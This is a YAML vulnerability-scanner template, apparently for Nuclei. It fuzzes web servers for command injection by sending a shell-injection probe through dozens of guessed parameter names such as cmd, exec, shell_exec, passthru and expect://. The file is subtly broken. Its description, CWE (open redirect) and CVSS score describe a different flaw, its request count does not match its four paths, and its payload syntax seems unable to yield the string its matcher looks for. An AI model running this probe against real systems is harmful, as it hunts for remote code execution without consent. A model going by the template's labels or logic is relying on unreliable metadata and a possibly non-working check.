id: 1rce2-2

info:
  name: 1rce
  author: xandsz
  severity: medium
  description: Verifica parâmetros ocultos que refletem dentro do HTML da página.
  tags: fuzzer, generic
  classification:
    cwe-id: CWE-601
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
  metadata:
    max-request: 2

http:
  - method: GET
    path:
     - '{{BaseURL}}?cmd=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&command=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&exec=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&execute=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&payload=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&code=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&shell=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV'
     - '{{BaseURL}}?script=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&system=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&run=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&eval=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&proc=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&eval_base64=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&include=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&require=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&load=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&open=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&read=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&write=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&fetch=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&wget=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&curl=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV'
     - '{{BaseURL}}?php%3A%2F%2Finput=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&data%3A%2F%2F=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&phar%3A%2F%2F=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&expect%3A%2F%2F=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&zlib%3A%2F%2F=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&compress.zlib%3A%2F%2F=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&zip%3A%2F%2F=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&backtick_cmd=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&os_cmd=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&exec_cmd=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&proc_open=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&popen=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&passthru=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&system_exec=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&system_cmd=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV'
     - '{{BaseURL}}?system_command=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&system_shell=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&shell_exec=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&assert=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&assertion=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&assert_code=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&assert_eval=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&assert_php=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&assert_template=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&eval_shell=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&exec_shell=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV&shell_eval=%3Becho%20ADD-CMD%2480%2B20%29%24%28echo%20GAURAV%29GAURAV'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - ADD-CMD100GAURAVGAURAV
